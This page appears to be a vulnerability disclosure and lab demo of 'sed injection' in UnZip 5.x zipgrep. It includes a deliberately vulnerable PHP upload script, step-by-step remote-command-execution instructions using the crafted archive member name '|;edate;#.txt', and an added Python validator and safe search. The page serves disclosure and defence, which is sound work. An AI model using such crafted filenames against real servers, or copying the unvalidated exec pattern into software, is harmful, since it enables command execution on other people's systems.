a sample of a vulnerability in ancient zipgrep

written by cleemy desu wayo / licensed under CC0 / last update: 2023-08-13

uploaded file information:

(no file uploaded)

The source of test-zipgrep.php, as it leaked into the rendered page (reformatted; the head of the file, which prints "(no file uploaded)" when nothing was posted, did not survive the rendering and is reconstructed here):

    <?php
    // reconstructed head: the original condition was lost when the page rendered the script
    if (empty($_FILES['file'])) {
        print('(no file uploaded)');
    } else {
        $is_zip_str = 'no';
        $original_file_basename = basename($_FILES['file']['name']);
        $original_file_pathinfo = pathinfo($original_file_basename);
        if ($original_file_pathinfo['extension'] === 'zip') {
            $is_zip_str = 'yes';
            // exec zipgrep on the uploaded archive; the injection happens inside
            // zipgrep when it processes the member names, not in this line
            exec('zipgrep CVE "' . $_FILES['file']['tmp_name'] . '"', $search_results);
            // move to ./zip_stored/
            move_uploaded_file($_FILES['file']['tmp_name'], './zip_stored/' . $original_file_basename);
            // save search results
            $fp = fopen('./zip_stat/latest-search-result.txt', 'w');
            foreach ($search_results as $line) {
                fwrite($fp, $line . "\n");
            }
            fclose($fp);
        }
        print('
    file name: ' . htmlspecialchars($_FILES['file']['name']) . '
    ');
        print('
    tmp file name: ' . htmlspecialchars($_FILES['file']['tmp_name']) . '
    ');
        print('
    stored to zip_stored/ directory: ' . htmlspecialchars($is_zip_str) . '
    ');
    }
    ?>

try uploading a file:

about this bug

This is an ancient vulnerability of zipgrep in Unzip 5.x. zipgrep is a wrapper script. Perhaps this problem does not exist for zipgrep in Unzip 6.x.

I notified the developers of Unzip about this bug on Feb 12, 2022. The current maintainer is aware of the bug, but it is likely that a fixed version will not be released.

I call this bug, and others like it, "sed injection". A similar vulnerability is CVE-2005-0758. I became aware of sed injection on my own in 2013, but I was not aware of CVE-2005-0758 at that time.

This sample is a modified version of "a sample of CVE-2005-0758" ( https://gitlab.com/-/snippets/2580438 ).

about sed injection

try this sample on Knoppix 3.6

Apache 1.3.31, PHP 4.3.8, and the vulnerable zipgrep are already installed when booting from the Knoppix 3.6 (released in 2004) Live CD.

You can run this sample on Knoppix 3.6 very easily without special settings.

download Knoppix iso

try RCE

  1. boot the Knoppix Live CD ordinarily
  2. put this file (test-zipgrep.php) in /var/www/ on the server. "server" means Knoppix.
  3. change owner and chmod (on server)
    $ cd /var/www
    $ sudo chown www-data:www-data test-zipgrep.php
    $ sudo chmod 600 test-zipgrep.php
  4. start apache (on server)
    $ sudo apachectl start
  5. try connecting from a client machine to http://<knoppix>/test-zipgrep.php
    (when Knoppix is running on VirtualBox or some such, "client machine" means the host OS)
  6. create some directories in /var/www (on server)
    $ cd /var/www
    $ sudo mkdir zip_stat
    $ sudo mkdir zip_stored
  7. change owner and chmod (on server)
    $ sudo chown www-data:www-data zip_stat zip_stored
    $ sudo chmod 707 zip_stat zip_stored
  8. create an ordinary text file (on client)
    $ echo CVE-2099-0001 > hoge.txt
  9. create a text file with a crafted filename (on client)
    $ echo CVE-2099-0002 > '|;edate;#.txt'
  10. archive these files into one .zip (on client)
    $ zip test1.zip *.txt
      adding: hoge.txt (stored 0%)
      adding: |;edate;#.txt (stored 0%)
  11. access http://<knoppix>/test-zipgrep.php from the client machine
    and upload test1.zip
  12. check that the upload succeeded (on server)
    $ cd /var/www/zip_stored
    $ sudo wc -c test1.zip
    348 test1.zip
  13. check that the date command was executed and the search result is weird (on server)
    $ cd /var/www/zip_stat
    $ cat latest-search-result.txt
    hoge.txt:CVE-2099-0001
    Sun Aug 13 15:49:50 EDT 2023
    CVE-2099-0002
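What step 13 shows, and one way an upload handler like test-zipgrep.php can defend against it (an added example in Python; it is not part of the original page and not code from the UnZip project): the member name `|;edate;#.txt` ends up inside a sed expression that zipgrep uses to prefix each match with the file name, so the `|` closes the substitution, `;` starts a new sed command, and GNU sed's `e` command runs `date`, whose output is the line between the two CVE lines. The exact shape of that sed expression in the 5.x script is an assumption on my part; the page only shows the effect. Two defensive pieces follow: `unsafe_members()` rejects any archive whose member names contain characters that can escape a sed or shell expression, so a handler can refuse the upload before ever calling zipgrep, and `safe_zipgrep()` performs the same search in Python, building the `name:line` prefix by string concatenation so that no member name is ever parsed as code. The archive from `build_sample_zip()` is constructed here to mirror steps 8 to 10.

```python
import io
import re
import zipfile
from typing import List

# Characters that can break out of a sed expression or an unquoted shell word
# when an archive member name is interpolated into a command. The '|' entry
# reflects the assumption that the 5.x zipgrep script uses '|' as the sed
# delimiter; anything outside printable ASCII is rejected as well.
UNSAFE_MEMBER_NAME = re.compile(r'[|;&\n\r`$"\'\\]|[^\x20-\x7e]')


def unsafe_members(data: bytes) -> List[str]:
    """Return the member names that must never reach a sed/shell pipeline.

    An upload handler would call this before invoking zipgrep and refuse the
    archive if the list is non-empty.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [name for name in zf.namelist() if UNSAFE_MEMBER_NAME.search(name)]


def safe_zipgrep(data: bytes, pattern: str) -> List[str]:
    """Equivalent of 'zipgrep PATTERN archive.zip' for text members, in-process.

    The 'name:line' prefix is built by string concatenation, so a member name
    is data here, never part of a sed script or a shell command line.
    """
    rx = re.compile(pattern)
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith('/'):          # skip directory entries
                continue
            text = zf.read(name).decode('utf-8', errors='replace')
            for line in text.splitlines():
                if rx.search(line):
                    hits.append(f'{name}:{line}')
    return hits


def build_sample_zip() -> bytes:
    """Constructed test archive mirroring steps 8-10: one ordinary member and
    one whose name carries the sed injection shown on the page."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('hoge.txt', 'CVE-2099-0001\n')
        zf.writestr('|;edate;#.txt', 'CVE-2099-0002\n')
    return buf.getvalue()


if __name__ == '__main__':
    archive = build_sample_zip()
    bad = unsafe_members(archive)
    if bad:
        print('upload rejected, unsafe member names:', bad)
    # The in-process search still works and yields only real matches,
    # with no 'date' output mixed into the results.
    for hit in safe_zipgrep(archive, 'CVE'):
        print(hit)
```

With the constructed archive, `unsafe_members()` returns only the crafted name, and `safe_zipgrep()` returns exactly the two `name:line` matches, with nothing executed on the server. The same validation belongs in the PHP handler immediately before the `exec('zipgrep ...')` call; escaping the temporary path there would not help, because the injected text comes from inside the archive, not from the path.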

crafted filenames examples

several commands

exec xgalaga on server-side

get a reverse shell